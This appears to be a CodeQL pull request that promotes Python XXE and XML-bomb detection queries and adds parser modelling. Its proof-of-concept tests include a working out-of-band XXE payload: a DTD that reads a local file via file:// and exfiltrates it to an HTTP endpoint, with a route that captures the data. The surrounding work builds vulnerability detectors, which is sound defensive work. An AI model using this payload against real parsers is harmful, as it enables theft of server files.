Python: Promote XXE and XML-bomb queries #8634

Merged 54 commits on May 9, 2022
Changes from 50 commits
Commits
65907c9
Python: Copy Xxe/XmlBomb queries from JS
RasmusWL Mar 24, 2022
e45f9d6
Python: Adjust Xxe/XmlBomb for Python
RasmusWL Mar 24, 2022
91795b8
Python: Add simple test of Xxe/XmlBomb
RasmusWL Mar 24, 2022
a1d88e3
Python: Adjust XXE PoC for newer lxml versions
RasmusWL Mar 24, 2022
57b9780
Python: XXE: Add example of exfiltrating data through dtd-retrival
RasmusWL Mar 24, 2022
769f569
Python: Add taint for `StringIO` and `BytesIO`
RasmusWL Mar 29, 2022
c365337
Python: Delete `XmlEntityInjection.ql`
RasmusWL Mar 29, 2022
b00766b
Python: Adjust XXE qhelp
RasmusWL Mar 29, 2022
56b9c89
Python: Adjust `XmlBomb.qhelp` from JS
RasmusWL Mar 29, 2022
9caf4be
Python: Add PortSwigger link to `Xxe.qhelp`
RasmusWL Mar 29, 2022
e005a5c
Python: Promote `XMLParsing` concept
RasmusWL Mar 29, 2022
e45288e
Python: => `XMLParsingVulnerabilityKind`
RasmusWL Mar 29, 2022
35ccba2
Python: Promote `XMLParsing` concept test
RasmusWL Mar 29, 2022
1ea4bcc
Python: Make `XMLParsing` a `Decoding` subclass
RasmusWL Mar 29, 2022
c4473c5
Python: Rename lxml XPath tests
RasmusWL Mar 31, 2022
3040adf
Python: Handle `XMLParser().close()` for XPath
RasmusWL Mar 31, 2022
80b5cde
Python: Promote lxml parsing modeling
RasmusWL Mar 31, 2022
7f5f767
Python: Promote `xmltodict` modeling
RasmusWL Mar 31, 2022
64aa503
Python: Promote `xml.etree` modeling
RasmusWL Mar 31, 2022
a315aa8
Python: Add some links in QLDocs
RasmusWL Mar 31, 2022
6774085
Python: Add note about parseid/XMLID
RasmusWL Mar 31, 2022
12cbdcd
Python: Model `lxml.etree.XMLID`
RasmusWL Mar 31, 2022
386ff53
Python: Model `lxml.iterparse`
RasmusWL Mar 31, 2022
543454e
Python: Model file access from XML parsing
RasmusWL Mar 31, 2022
db43d04
Python: Add test showing misalignment of xml.etree modeling
RasmusWL Mar 31, 2022
70b3eec
Python: Merge `xml.etree.ElementTree` models
RasmusWL Mar 31, 2022
05bb0ef
Python: Align `xml.etree.ElementTree` modeling
RasmusWL Mar 31, 2022
e112697
Python: Promote `xml.sax` and `xml.dom.*` modeling
RasmusWL Mar 31, 2022
1d7cec6
Python: `xml.sax.parse` is not a method call
RasmusWL Mar 31, 2022
b4c0065
Python: Extend FileSystemAccess for `xml.sax` and `xml.dom.*` parsing
RasmusWL Mar 31, 2022
673220b
Python: Minor cleanup of `XmlParsingTest`
RasmusWL Mar 31, 2022
5083023
Python: Move XML parsing PoC
RasmusWL Mar 31, 2022
b8d3c5e
Python: Remove last bits of experimental XML modeling
RasmusWL Mar 31, 2022
4abab22
Python: Promote XXE and XML-bomb queries
RasmusWL Mar 31, 2022
d2b03bb
Python: Fix `SimpleXmlRpcServer.ql`
RasmusWL Mar 31, 2022
ab59d5c
Python: Rename to `XmlParsing`
RasmusWL Apr 5, 2022
1f285b8
Python: Rename to `XmlParsingVulnerabilityKind`
RasmusWL Apr 5, 2022
a7dab53
Python: Add change-note
RasmusWL Apr 5, 2022
b7f56dd
Python: Rewrite concepts to use `extends ... instanceof ...`
RasmusWL Apr 5, 2022
23637fd
Merge branch 'main' into promote-xxe
RasmusWL Apr 6, 2022
c784f15
Python: Rename more XML classes to follow convention
RasmusWL Apr 6, 2022
f2f0873
Python: Use new `API::CallNode` for XML constant check
RasmusWL Apr 6, 2022
7728b6c
Python: Change XmlBomb vulnerability kind
RasmusWL Apr 7, 2022
405480c
Python: Rename sink definitions for XXE/XML bomb
RasmusWL Apr 7, 2022
8191be9
Python: Move last XXE/XML bomb out of experimental
RasmusWL Apr 7, 2022
517444b
Python: Fix `SimpleXmlRpcServer.expected`
RasmusWL Apr 7, 2022
bb6969a
Merge branch 'main' into promote-xxe
RasmusWL Apr 20, 2022
5f01fc2
Merge branch 'main' into promote-xxe
RasmusWL May 2, 2022
714465b
Python: Refactor `SaxParserSetFeatureCall`
RasmusWL May 2, 2022
f5854f3
Python: Apply suggestions from code review
RasmusWL May 9, 2022
f22bd03
Python: Slight refactor of `LxmlParsing`
RasmusWL May 9, 2022
3634922
Python: Fix casing of `XMLDomParsing`
RasmusWL May 9, 2022
de05b10
Python: Fix singleton set
RasmusWL May 9, 2022
4a67891
Python: Apply suggestions from code review
RasmusWL May 9, 2022
1 change: 1 addition & 0 deletions docs/codeql/support/reusables/frameworks.rst
@@ -214,3 +214,4 @@ Python built-in support
 libtaxii, TAXII utility library
 libxml2, XML processing library
 lxml, XML processing library
+xmltodict, XML processing library
1 change: 1 addition & 0 deletions python/PoCs/README.md
@@ -0,0 +1 @@
+A place to collect proof of concept for how certain vulnerabilities work.
@@ -70,6 +70,14 @@
 <foo>bar</foo>
 """

+exfiltrate_through_dtd_retrieval = f"""<?xml version="1.0"?>
+<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://{HOST}:{PORT}/exfiltrate-through.dtd"> %xxe; ]>
+"""
+
+predefined_entity_xml = """<?xml version="1.0"?>
+<test>&lt;</test>
+"""
+
 # ==============================================================================
 # other setup

@@ -95,6 +103,22 @@ def test_xxe():
     hit_xxe = True
     return "ok"

+@app.route("/exfiltrate-through.dtd")
+def exfiltrate_through_dtd():
+    return f"""<!ENTITY % file SYSTEM "file://{FLAG_PATH}">
+<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://{HOST}:{PORT}/exfiltrate-data?data=%file;'>">
+%eval;
+%exfiltrate;
+"""
+
+exfiltrated_data = None
+@app.route("/exfiltrate-data")
+def exfiltrate_data():
+    from flask import request
+    global exfiltrated_data
+    exfiltrated_data = request.args["data"]
+    return "ok"
+
 def run_app():
     app.run(host=HOST, port=PORT)

@@ -346,7 +370,7 @@ def test_local_xxe_enabled_by_default():
         parser = lxml.etree.XMLParser()
         root = lxml.etree.fromstring(local_xxe, parser=parser)
         assert root.tag == "test"
-        assert root.text == "SECRET_FLAG\n", root.text
+        assert root.text == "SECRET_FLAG", root.text

     @staticmethod
     def test_local_xxe_disabled():
@@ -361,11 +385,7 @@ def test_remote_xxe_disabled_by_default():
         hit_xxe = False

         parser = lxml.etree.XMLParser()
-        try:
-            root = lxml.etree.fromstring(remote_xxe, parser=parser)
-            assert False
-        except lxml.etree.XMLSyntaxError as e:
-            assert "Failure to process entity remote_xxe" in str(e)
+        root = lxml.etree.fromstring(remote_xxe, parser=parser)
         assert hit_xxe == False

     @staticmethod
@@ -416,6 +436,23 @@ def test_dtd_manually_enabled():
             pass
         assert hit_dtd == False

+    @staticmethod
+    def test_exfiltrate_through_dtd():
+        # note that this only works when the data to exfiltrate does not contain a newline :|
+        global exfiltrated_data
+        exfiltrated_data = None
+        parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
+        with pytest.raises(lxml.etree.XMLSyntaxError):
+            lxml.etree.fromstring(exfiltrate_through_dtd_retrieval, parser=parser)
+
+        assert exfiltrated_data == "SECRET_FLAG"
+
+    @staticmethod
+    def test_predefined_entity():
+        parser = lxml.etree.XMLParser(resolve_entities=False)
+        root = lxml.etree.fromstring(predefined_entity_xml, parser=parser)
+        assert root.tag == "test"
+        assert root.text == "<"
+
 # ==============================================================================

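The `test_predefined_entity` case checks that `&lt;` still resolves when lxml is told not to resolve entities. The following is a minimal sketch of the same property using only the standard library. This is an assumption made for portability: the PoC itself uses lxml, and `xml.etree.ElementTree` and `xml.dom.minidom` are swapped in here so the snippet has no third-party dependency. The predefined XML entities need no DTD, so a parser can decode them without any entity declarations being processed.

```python
import xml.dom.minidom
import xml.etree.ElementTree as ET

# Same document as `predefined_entity_xml` in the PoC:
# no DOCTYPE, only a predefined entity reference.
predefined_entity_xml = """<?xml version="1.0"?>
<test>&lt;</test>
"""

# ElementTree decodes the predefined entity into the literal character.
root = ET.fromstring(predefined_entity_xml)
etree_result = (root.tag, root.text)

# minidom behaves the same way; the text node holds the decoded character.
dom = xml.dom.minidom.parseString(predefined_entity_xml)
minidom_text = dom.documentElement.firstChild.data

print(etree_result, minidom_text)
```

A query that flags every entity reference would therefore be too broad; the interesting cases are entities declared in a DTD.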
1 change: 1 addition & 0 deletions python/PoCs/XmlParsing/flag
@@ -0,0 +1 @@
+SECRET_FLAG
@@ -0,0 +1,4 @@
+---
+category: minorAnalysis
+---
+* Added taint propagation for `io.StringIO` and `io.BytesIO`. This addition was originally [submitted as part of an experimental query by @jorgectf](https://github.com/github/codeql/pull/6112).
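To illustrate why this taint step matters for the XML queries, here is a hedged sketch of the kind of code it is meant to cover. The helper names `parse_from_memory` and `parse_bytes_from_memory` are hypothetical and do not appear in the PR, and the standard-library parser is used only to keep the example self-contained. The untrusted text never reaches the parser directly; it arrives wrapped in a file-like object, so an analysis without a step from the constructor argument to the resulting object would lose track of it.

```python
import io
import xml.etree.ElementTree as ET


def parse_from_memory(untrusted_xml: str) -> ET.Element:
    """Hypothetical helper: wrap attacker-controlled text in a file-like object."""
    buffer = io.StringIO(untrusted_xml)  # taint should flow from the argument to `buffer`
    tree = ET.parse(buffer)  # the parser only ever sees the file-like object
    return tree.getroot()


def parse_bytes_from_memory(untrusted_xml: bytes) -> ET.Element:
    """Hypothetical helper: the same pattern for bytes via `io.BytesIO`."""
    return ET.parse(io.BytesIO(untrusted_xml)).getroot()


root = parse_from_memory("<user>alice</user>")
root_b = parse_bytes_from_memory(b"<user>bob</user>")
print(root.tag, root.text, root_b.text)
```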
59 changes: 59 additions & 0 deletions python/ql/lib/semmle/python/Concepts.qll
@@ -498,6 +498,65 @@ module XML {
       abstract string getName();
     }
   }
+
+  /**
+   * A kind of XML vulnerability.
+   *
+   * See overview of kinds at https://pypi.org/project/defusedxml/#python-xml-libraries
+   *
+   * See PoC at `python/PoCs/XmlParsing/PoC.py` for some tests of vulnerable XML parsing.
+   */
+  class XmlParsingVulnerabilityKind extends string {
+    XmlParsingVulnerabilityKind() { this in ["XML bomb", "XXE", "DTD retrieval"] }
+
+    /**
+     * Holds for XML bomb vulnerability kind, such as 'Billion Laughs' and 'Quadratic
+     * Blowup'.
+     *
+     * While a parser could technically be vulnerable to one and not the other, from our
+     * point of view the interesting part is that it IS vulnerable to these types of
+     * attacks, and not so much which one specifically works. In practice I haven't seen
+     * a parser that is vulnerable to one and not the other.
+     */
+    predicate isXmlBomb() { this = "XML bomb" }
+
+    /** Holds for XXE vulnerability kind. */
+    predicate isXxe() { this = "XXE" }
+
+    /** Holds for DTD retrieval vulnerability kind. */
+    predicate isDtdRetrieval() { this = "DTD retrieval" }
+  }
+
+  /**
+   * A data-flow node that parses XML.
+   *
+   * Extend this class to model new APIs. If you want to refine existing API models,
+   * extend `XmlParsing` instead.
+   */
+  class XmlParsing extends Decoding instanceof XmlParsing::Range {
+    /**
+     * Holds if this XML parsing is vulnerable to `kind`.
+     */
+    predicate vulnerableTo(XmlParsingVulnerabilityKind kind) { super.vulnerableTo(kind) }
+  }
+
+  /** Provides classes for modeling XML parsing APIs. */
+  module XmlParsing {
+    /**
+     * A data-flow node that parses XML.
+     *
+     * Extend this class to model new APIs. If you want to refine existing API models,
+     * extend `XmlParsing` instead.
+     */
+    abstract class Range extends Decoding::Range {
+      /**
+       * Holds if this XML parsing is vulnerable to `kind`.
+       */
+      abstract predicate vulnerableTo(XmlParsingVulnerabilityKind kind);
+
+      override string getFormat() { result = "XML" }
+    }
+  }
 }

 /** Provides classes for modeling LDAP-related APIs. */
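The "XML bomb" kind in `XmlParsingVulnerabilityKind` covers attacks such as 'Billion Laughs', where nested entity declarations make a small document expand to a much larger one. The sketch below shows the mechanism at a deliberately tiny scale. The helper `build_nested_entity_doc` and its parameters are hypothetical, the standard-library `xml.etree.ElementTree` parser is an assumption chosen so the snippet runs without extra packages, and the sizes are kept small so the expansion is harmless. Newer Expat releases may also cap amplification on large inputs, which this example stays far below.

```python
import xml.etree.ElementTree as ET


def build_nested_entity_doc(levels: int, fanout: int, payload: str = "lol") -> str:
    """Hypothetical helper: each entity references the previous one `fanout` times."""
    decls = [f'<!ENTITY e0 "{payload}">']
    for i in range(1, levels + 1):
        refs = f"&e{i - 1};" * fanout
        decls.append(f'<!ENTITY e{i} "{refs}">')
    dtd = "\n".join(decls)
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE bomb [\n{dtd}\n]>\n"
        f"<bomb>&e{levels};</bomb>"
    )


# Three levels with a fan-out of ten give 10**3 copies of the payload.
doc = build_nested_entity_doc(levels=3, fanout=10)
root = ET.fromstring(doc)
expanded_len = len(root.text)

print(f"input: {len(doc)} chars, expanded text: {expanded_len} chars")
```

The expanded size grows as `fanout ** levels` while the input grows only linearly in `levels`, which is why a parser that expands internal entities without limits is reported as vulnerable regardless of which specific bomb variant is used.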
1 change: 1 addition & 0 deletions python/ql/lib/semmle/python/Frameworks.qll
@@ -52,3 +52,4 @@ private import semmle.python.frameworks.Ujson
 private import semmle.python.frameworks.Urllib3
 private import semmle.python.frameworks.Yaml
 private import semmle.python.frameworks.Yarl
+private import semmle.python.frameworks.Xmltodict